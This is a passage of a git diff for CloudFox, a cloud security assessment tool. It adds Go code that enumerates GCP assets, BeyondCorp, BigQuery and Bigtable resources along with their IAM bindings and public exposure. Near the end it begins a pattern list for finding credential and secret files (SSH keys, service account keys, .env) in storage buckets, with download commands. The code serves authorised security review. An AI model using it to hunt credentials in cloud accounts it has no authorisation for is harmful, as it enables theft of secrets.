gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + counts[assetResult.AssetType]++ + } + + var result []AssetTypeCount + for assetType, count := range counts { + result = append(result, AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + + return result, nil +} + +// SearchAllResources searches for resources across the organization or project +func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + req := &assetpb.SearchAllResourcesRequest{ + Scope: scope, + Query: query, + } + + it := client.SearchAllResources(ctx, req) + for { + resource, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := AssetInfo{ + Name: resource.Name, + AssetType: resource.AssetType, + ProjectID: resource.Project, + Location: resource.Location, + DisplayName: resource.DisplayName, + Description: resource.Description, + Labels: resource.Labels, + State: resource.State, + CreateTime: resource.CreateTime.String(), + UpdateTime: resource.UpdateTime.String(), + } + + assets = append(assets, info) + } + + return assets, nil +} + +func (s *AssetService) parseAsset(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.Resource != nil { + info.Location = assetResult.Resource.Location + } + + return info +} + +func (s *AssetService) parseAssetWithIAM(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.IamPolicy != nil { + info.HasIAMPolicy = true + info.IAMBindingCount = len(assetResult.IamPolicy.Bindings) + + // Store actual bindings and check for public access + for _, binding := range assetResult.IamPolicy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + info.IAMBindings = append(info.IAMBindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + return info +} + +func extractAssetName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ExtractAssetTypeShort returns a shortened version of the asset type +func ExtractAssetTypeShort(assetType string) string { + parts := strings.Split(assetType, "/") + if len(parts) == 2 { + return parts[1] + } + return assetType +} diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go new file mode 100644 index 00000000..c1255654 --- /dev/null +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -0,0 +1,234 @@ +package beyondcorpservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + beyondcorp "google.golang.org/api/beyondcorp/v1" +) + +type BeyondCorpService struct { + session *gcpinternal.SafeSession +} + +func New() *BeyondCorpService { + return &BeyondCorpService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { + return &BeyondCorpService{session: session} +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// AppConnectorInfo represents a BeyondCorp app connector +type AppConnectorInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + PrincipalInfo string `json:"principalInfo"` + ResourceInfo string `json:"resourceInfo"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// AppConnectionInfo represents a BeyondCorp app connection +type AppConnectionInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + Type string `json:"type"` + ApplicationEndpoint string `json:"applicationEndpoint"` + Connectors []string `json:"connectors"` + Gateway string `json:"gateway"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// ListAppConnectors retrieves all BeyondCorp app connectors +func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorInfo, error) { + ctx := context.Background() + var service *beyondcorp.Service + var err error + + if s.session != nil { + service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = beyondcorp.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connectors []AppConnectorInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnectors.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1ListAppConnectorsResponse) error { + for _, connector := range page.AppConnectors { + info := s.parseAppConnector(connector, projectID) + + // Get IAM policy for this connector + iamPolicy, iamErr := service.Projects.Locations.AppConnectors.GetIamPolicy(connector.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connectors = append(connectors, info) + } + return nil + }) + if err != nil { + return connectors, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connectors, nil +} + +// ListAppConnections retrieves all BeyondCorp app connections +func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectionInfo, error) { + ctx := context.Background() + var service *beyondcorp.Service + var err error + + if s.session != nil { + service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = beyondcorp.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connections []AppConnectionInfo + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnections.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1ListAppConnectionsResponse) error { + for _, conn := range page.AppConnections { + info := s.parseAppConnection(conn, projectID) + + // Get IAM policy for this connection + iamPolicy, iamErr := service.Projects.Locations.AppConnections.GetIamPolicy(conn.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connections = append(connections, info) + } + return nil + }) + if err != nil { + return connections, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connections, nil +} + +func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1AppConnector, projectID string) AppConnectorInfo { + info := AppConnectorInfo{ + Name: extractName(connector.Name), + FullName: connector.Name, + ProjectID: projectID, + Location: extractLocation(connector.Name), + DisplayName: connector.DisplayName, + State: connector.State, + CreateTime: connector.CreateTime, + UpdateTime: connector.UpdateTime, + } + + if connector.PrincipalInfo != nil && connector.PrincipalInfo.ServiceAccount != nil { + info.PrincipalInfo = connector.PrincipalInfo.ServiceAccount.Email + } + + if connector.ResourceInfo != nil { + info.ResourceInfo = connector.ResourceInfo.Id + } + + return info +} + +func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1AppConnection, projectID string) AppConnectionInfo { + info := AppConnectionInfo{ + Name: extractName(conn.Name), + FullName: conn.Name, + ProjectID: projectID, + Location: extractLocation(conn.Name), + DisplayName: conn.DisplayName, + State: conn.State, + Type: conn.Type, + CreateTime: conn.CreateTime, + UpdateTime: conn.UpdateTime, + } + + if conn.ApplicationEndpoint != nil { + info.ApplicationEndpoint = fmt.Sprintf("%s:%d", conn.ApplicationEndpoint.Host, conn.ApplicationEndpoint.Port) + } + + for _, connector := range conn.Connectors { + info.Connectors = append(info.Connectors, extractName(connector)) + } + + if conn.Gateway != nil { + info.Gateway = extractName(conn.Gateway.AppGateway) + } + + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractLocation(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 426cb03f..8b2db6d8 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -2,33 +2,101 @@ package bigqueryservice import ( "context" + "fmt" + "strings" "time" "cloud.google.com/go/bigquery" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" + bqapi "google.golang.org/api/bigquery/v2" ) -// BigqueryDataset represents a dataset in BigQuery +// AccessEntry represents an access control entry on a dataset +type AccessEntry struct { + Role string `json:"role"` // OWNER, WRITER, READER + EntityType string `json:"entityType"` // User, Group, Domain, ServiceAccount, etc. + Entity string `json:"entity"` // The actual entity identifier +} + +// BigqueryDataset represents a dataset in BigQuery with security-relevant fields type BigqueryDataset struct { - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - Description string - Name string - ProjectID string + // Basic info + DatasetID string `json:"datasetID"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + + // Security-relevant fields + DefaultTableExpiration time.Duration `json:"defaultTableExpiration"` + DefaultPartitionExpiration time.Duration `json:"defaultPartitionExpiration"` + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + Labels map[string]string `json:"labels"` + StorageBillingModel string `json:"storageBillingModel"` + MaxTimeTravel time.Duration `json:"maxTimeTravel"` + + // Access control (IAM-like) + AccessEntries []AccessEntry `json:"accessEntries"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" } -// BigqueryTable represents a table in BigQuery +// BigqueryTable represents a table in BigQuery with security-relevant fields type BigqueryTable struct { - TableID string - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - NumBytes int64 - Description string - ProjectID string + // Basic info + TableID string `json:"tableID"` + DatasetID string `json:"datasetID"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + Description string `json:"description"` + TableType string `json:"tableType"` // TABLE, VIEW, MATERIALIZED_VIEW, EXTERNAL, SNAPSHOT + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + ExpirationTime time.Time `json:"expirationTime"` + + // Size info + NumBytes int64 `json:"numBytes"` + NumLongTermBytes int64 `json:"numLongTermBytes"` + NumRows uint64 `json:"numRows"` + + // Security-relevant fields + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` + Labels map[string]string `json:"labels"` + RequirePartitionFilter bool `json:"requirePartitionFilter"` + + // Partitioning info + IsPartitioned bool `json:"isPartitioned"` + PartitioningType string `json:"partitioningType"` // "TIME" or "RANGE" + + // View info + IsView bool `json:"isView"` + ViewQuery string `json:"viewQuery"` + UseLegacySQL bool `json:"useLegacySQL"` + + // Streaming info + HasStreamingBuffer bool `json:"hasStreamingBuffer"` + + // IAM bindings (table-level) + IAMBindings []TableIAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` + PublicAccess string `json:"publicAccess"` +} + +// TableIAMBinding represents an IAM binding on a table +type TableIAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` } // CombinedBigqueryData represents both datasets and tables within a project @@ -38,14 +106,19 @@ type CombinedBigqueryData struct { } type BigQueryService struct { - // Placeholder for any required services or configuration + session *gcpinternal.SafeSession } -// New creates a new instance of BigQueryService +// New creates a new instance of BigQueryService (legacy - uses ADC directly) func New() *BigQueryService { return &BigQueryService{} } +// NewWithSession creates a BigQueryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryService { + return &BigQueryService{session: session} +} + // gcloud alpha bq datasets list // gcloud alpha bq datasets describe terragoat_dev_dataset // gcloud alpha bq tables list --dataset terragoat_dev_dataset @@ -78,9 +151,16 @@ func (bq *BigQueryService) BigqueryDatasetsAndTables(projectID string) (Combined // BigqueryDatasets retrieves datasets from the given projectID across all locations func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() @@ -92,34 +172,160 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := ds.Metadata(ctx) if err != nil { - return nil, err - } - datasets = append(datasets, BigqueryDataset{ - DatasetID: ds.DatasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - Description: meta.Description, - Name: meta.Name, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + dataset := BigqueryDataset{ + DatasetID: ds.DatasetID, + Name: meta.Name, + Description: meta.Description, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + DefaultTableExpiration: meta.DefaultTableExpiration, + DefaultPartitionExpiration: meta.DefaultPartitionExpiration, + Labels: meta.Labels, + StorageBillingModel: meta.StorageBillingModel, + MaxTimeTravel: meta.MaxTimeTravel, + } + + // Parse encryption + if meta.DefaultEncryptionConfig != nil && meta.DefaultEncryptionConfig.KMSKeyName != "" { + dataset.EncryptionType = "CMEK" + dataset.KMSKeyName = meta.DefaultEncryptionConfig.KMSKeyName + } else { + dataset.EncryptionType = "Google-managed" + } + + // Parse access entries + accessEntries, isPublic, publicAccess := parseDatasetAccess(meta.Access) + dataset.AccessEntries = accessEntries + dataset.IsPublic = isPublic + dataset.PublicAccess = publicAccess + + datasets = append(datasets, dataset) } return datasets, nil } +// parseDatasetAccess converts BigQuery access entries to our format and checks for public access +func parseDatasetAccess(access []*bigquery.AccessEntry) ([]AccessEntry, bool, string) { + var entries []AccessEntry + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + for _, a := range access { + if a == nil { + continue + } + + entry := AccessEntry{ + Role: string(a.Role), + EntityType: entityTypeToString(a.EntityType), + Entity: a.Entity, + } + + // Check for special access (views, routines, datasets) + if a.View != nil { + entry.EntityType = "View" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.View.ProjectID, a.View.DatasetID, a.View.TableID) + } + if a.Routine != nil { + entry.EntityType = "Routine" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.Routine.ProjectID, a.Routine.DatasetID, a.Routine.RoutineID) + } + if a.Dataset != nil { + entry.EntityType = "Dataset" + entry.Entity = fmt.Sprintf("%s.%s", a.Dataset.Dataset.ProjectID, a.Dataset.Dataset.DatasetID) + } + + // Check for public access + if a.EntityType == bigquery.SpecialGroupEntity { + if a.Entity == "allUsers" || strings.Contains(strings.ToLower(a.Entity), "allusers") { + hasAllUsers = true + isPublic = true + } + if a.Entity == "allAuthenticatedUsers" || strings.Contains(strings.ToLower(a.Entity), "allauthenticatedusers") { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + + entries = append(entries, entry) + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return entries, isPublic, publicAccess +} + +// entityTypeToString converts BigQuery EntityType to a readable string +func entityTypeToString(et bigquery.EntityType) string { + switch et { + case bigquery.DomainEntity: + return "Domain" + case bigquery.GroupEmailEntity: + return "Group" + case bigquery.UserEmailEntity: + return "User" + case bigquery.SpecialGroupEntity: + return "SpecialGroup" + case bigquery.ViewEntity: + return "View" + case bigquery.IAMMemberEntity: + return "IAMMember" + case bigquery.RoutineEntity: + return "Routine" + case bigquery.DatasetEntity: + return "Dataset" + default: + return "Unknown" + } +} + // BigqueryTables retrieves tables from the given projectID and dataset across all locations func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([]BigqueryTable, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() + // Create API service for IAM calls + var apiService *bqapi.Service + if bq.session != nil { + apiService, err = bqapi.NewService(ctx, bq.session.GetClientOption()) + } else { + apiService, err = bqapi.NewService(ctx) + } + if err != nil { + // Continue without IAM if service creation fails + apiService = nil + } + var tables []BigqueryTable ds := client.Dataset(datasetID) it := ds.Tables(ctx) @@ -129,22 +335,173 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := table.Metadata(ctx) if err != nil { - return nil, err - } - tables = append(tables, BigqueryTable{ - TableID: table.TableID, - DatasetID: datasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - NumBytes: meta.NumBytes, - Description: meta.Description, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + tbl := BigqueryTable{ + TableID: table.TableID, + DatasetID: datasetID, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + Description: meta.Description, + TableType: tableTypeToString(meta.Type), + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + ExpirationTime: meta.ExpirationTime, + NumBytes: meta.NumBytes, + NumLongTermBytes: meta.NumLongTermBytes, + NumRows: meta.NumRows, + Labels: meta.Labels, + RequirePartitionFilter: meta.RequirePartitionFilter, + } + + // Parse encryption + if meta.EncryptionConfig != nil && meta.EncryptionConfig.KMSKeyName != "" { + tbl.EncryptionType = "CMEK" + tbl.KMSKeyName = meta.EncryptionConfig.KMSKeyName + } else { + tbl.EncryptionType = "Google-managed" + } + + // Parse partitioning + if meta.TimePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "TIME" + } else if meta.RangePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "RANGE" + } + + // Parse view info + if meta.ViewQuery != "" { + tbl.IsView = true + tbl.ViewQuery = meta.ViewQuery + tbl.UseLegacySQL = meta.UseLegacySQL + } + + // Check for streaming buffer + if meta.StreamingBuffer != nil { + tbl.HasStreamingBuffer = true + } + + // Get table-level IAM policy + if apiService != nil { + iamBindings, isPublic, publicAccess := bq.getTableIAMPolicy(ctx, apiService, projectID, datasetID, table.TableID) + tbl.IAMBindings = iamBindings + tbl.IsPublic = isPublic + tbl.PublicAccess = publicAccess + } + + tables = append(tables, tbl) } return tables, nil } + +// getTableIAMPolicy retrieves IAM policy for a specific table +func (bq *BigQueryService) getTableIAMPolicy(ctx context.Context, apiService *bqapi.Service, projectID, datasetID, tableID string) ([]TableIAMBinding, bool, string) { + var bindings []TableIAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + resource := fmt.Sprintf("projects/%s/datasets/%s/tables/%s", projectID, datasetID, tableID) + policy, err := apiService.Tables.GetIamPolicy(resource, &bqapi.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // IAM not available or permission denied - return empty + return bindings, false, "None" + } + + for _, binding := range policy.Bindings { + iamBinding := TableIAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// tableTypeToString converts BigQuery TableType to a readable string +func tableTypeToString(tt bigquery.TableType) string { + switch tt { + case bigquery.RegularTable: + return "TABLE" + case bigquery.ViewTable: + return "VIEW" + case bigquery.ExternalTable: + return "EXTERNAL" + case bigquery.MaterializedView: + return "MATERIALIZED_VIEW" + case bigquery.Snapshot: + return "SNAPSHOT" + default: + return "UNKNOWN" + } +} + +// GetMemberType extracts the member type from entity info +func GetMemberType(entityType string, entity string) string { + switch entityType { + case "User": + return "User" + case "Group": + return "Group" + case "Domain": + return "Domain" + case "SpecialGroup": + if strings.Contains(strings.ToLower(entity), "allusers") { + return "PUBLIC" + } + if strings.Contains(strings.ToLower(entity), "allauthenticatedusers") { + return "ALL_AUTHENTICATED" + } + return "SpecialGroup" + case "IAMMember": + if strings.HasPrefix(entity, "serviceAccount:") { + return "ServiceAccount" + } + if strings.HasPrefix(entity, "user:") { + return "User" + } + if strings.HasPrefix(entity, "group:") { + return "Group" + } + return "IAMMember" + case "View": + return "AuthorizedView" + case "Routine": + return "AuthorizedRoutine" + case "Dataset": + return "AuthorizedDataset" + default: + return "Unknown" + } +} diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go new file mode 100644 index 00000000..6bd4e6fe --- /dev/null +++ b/gcp/services/bigtableService/bigtableService.go @@ -0,0 +1,163 @@ +package bigtableservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableService { + return &BigtableService{} +} + +type BigtableInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Type string `json:"type"` + State string `json:"state"` + Clusters []ClusterInfo `json:"clusters"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type BigtableTableInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + InstanceName string `json:"instanceName"` + ProjectID string `json:"projectId"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +type ClusterInfo struct { + Name string `json:"name"` + Location string `json:"location"` + ServeNodes int64 `json:"serveNodes"` + State string `json:"state"` +} + +type BigtableResult struct { + Instances []BigtableInstanceInfo + Tables []BigtableTableInfo +} + +func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, error) { + ctx := context.Background() + service, err := bigtableadmin.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + result := &BigtableResult{ + Instances: []BigtableInstanceInfo{}, + Tables: []BigtableTableInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range resp.Instances { + info := BigtableInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Type: instance.Type, + State: instance.State, + } + + // Get clusters + clustersResp, _ := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() + if clustersResp != nil { + for _, cluster := range clustersResp.Clusters { + info.Clusters = append(info.Clusters, ClusterInfo{ + Name: extractName(cluster.Name), + Location: cluster.Location, + ServeNodes: cluster.ServeNodes, + State: cluster.State, + }) + } + } + + // Get tables and their IAM policies + tablesResp, _ := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if tablesResp != nil { + for _, table := range tablesResp.Tables { + tableInfo := BigtableTableInfo{ + Name: extractName(table.Name), + FullName: table.Name, + InstanceName: info.Name, + ProjectID: projectID, + } + + // Get IAM policy for table + tableIamResp, err := service.Projects.Instances.Tables.GetIamPolicy(table.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && tableIamResp != nil { + for _, binding := range tableIamResp.Bindings { + tableInfo.IAMBindings = append(tableInfo.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + tableInfo.PublicAccess = checkPublicAccess(tableIamResp.Bindings) + } + + result.Tables = append(result.Tables, tableInfo) + } + } + + // Get IAM policy for instance + iamResp, err := service.Projects.Instances.GetIamPolicy(instance.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && iamResp != nil { + for _, binding := range iamResp.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + info.PublicAccess = checkPublicAccess(iamResp.Bindings) + } + + result.Instances = append(result.Instances, info) + } + + return result, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// checkPublicAccess checks if any IAM binding grants access to allUsers or allAuthenticatedUsers +func checkPublicAccess(bindings []*bigtableadmin.Binding) bool { + for _, binding := range bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return true + } + } + } + return false +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go new file mode 100644 index 00000000..c9f5e02b --- /dev/null +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -0,0 +1,299 @@ +package bucketenumservice + +import ( + "context" + "fmt" + "path/filepath" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" + "google.golang.org/api/storage/v1" +) + +type BucketEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BucketEnumService { + return &BucketEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BucketEnumService { + return &BucketEnumService{session: session} +} + +// SensitiveFileInfo represents a potentially sensitive file in a bucket +type SensitiveFileInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Category string `json:"category"` // credential, secret, config, backup, etc. + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + Description string `json:"description"` // Why it's sensitive + DownloadCmd string `json:"downloadCmd"` // gsutil command to download + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` // Whether the object has public access +} + +// SensitivePatterns defines patterns to search for sensitive files +type SensitivePattern struct { + Pattern string + Category string + RiskLevel string + Description string +} + +// GetSensitivePatterns returns all patterns to check for sensitive files +func GetSensitivePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials - CRITICAL + {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, + {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, + {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, + {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, + {Pattern: ".pem", Category: "Credential", RiskLevel: "CRITICAL", Description: "PEM private key"}, + {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, + {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, + {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, + {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, + {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, + {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, + + // Secrets - CRITICAL/HIGH + {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, + {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, + {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, + {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, + {Pattern: "auth", 